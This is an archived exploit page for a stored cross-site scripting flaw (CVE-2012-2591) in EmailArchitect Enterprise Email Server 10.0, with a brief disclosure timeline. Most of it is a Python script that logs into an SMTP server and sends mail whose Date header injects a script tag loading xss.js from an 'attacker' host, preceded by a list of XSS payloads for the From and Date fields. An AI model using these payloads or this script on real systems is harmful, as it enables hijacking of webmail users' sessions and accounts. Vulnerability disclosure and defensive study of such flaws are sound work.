EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting: Posted Aug 8, 2012; Authored by loneferret; EmailArchitect Enterprise Email Server version 10.0 suffers from a stored cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2012-2591; SHA-256 | 1d614ed71a8927d8aefe626bbcff7dd35a56dc0ab018757a65f61785d9f38e5f; Download | Favorite | View

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

#!/usr/bin/python
 
'''
Author: loneferret of Offensive Security
Product: EmailArchitect Enterprise Email Server
Version: 10.0
Vendor Site: http://www.emailarchitect.net
Software Download Link: http://www.emailarchitect.net/webapp/download/easetup.exe
 
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure
 
Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86), OS: MAC OS Lion
Browser Used: Internet Explorer 9, Firefox 12
 
Injection Point: From
Injection Payload(s):
1:  ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
 
Injection Point: Date
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
2: <SCRIPT>alert('XSS')</SCRIPT>
3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
6: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
7: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
8: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>
 
'''
 
 
import smtplib, urllib2
 
payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>"""
 
def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += "Date: Today" + payload + "\r\n"
        msg += "Subject: XSS\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS.\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()
 
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"
 
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)

Top Authors In Last 30 Days

Red Hat 261 files
Ubuntu 106 files
indoushka 23 files
Debian 20 files
Gentoo 14 files
Google Security Research 13 files
CraCkEr 11 files
Mirabbas Agalarov 9 files
Apple 8 files
Ivan Fratric 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,755)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,851)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,365)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,645)
UNIX (9,245)
UnixWare (186)
Windows (6,555)
Other

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

Share This

EmailArchitect Enterprise Email Server 10.0 Cross Site Scripting

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems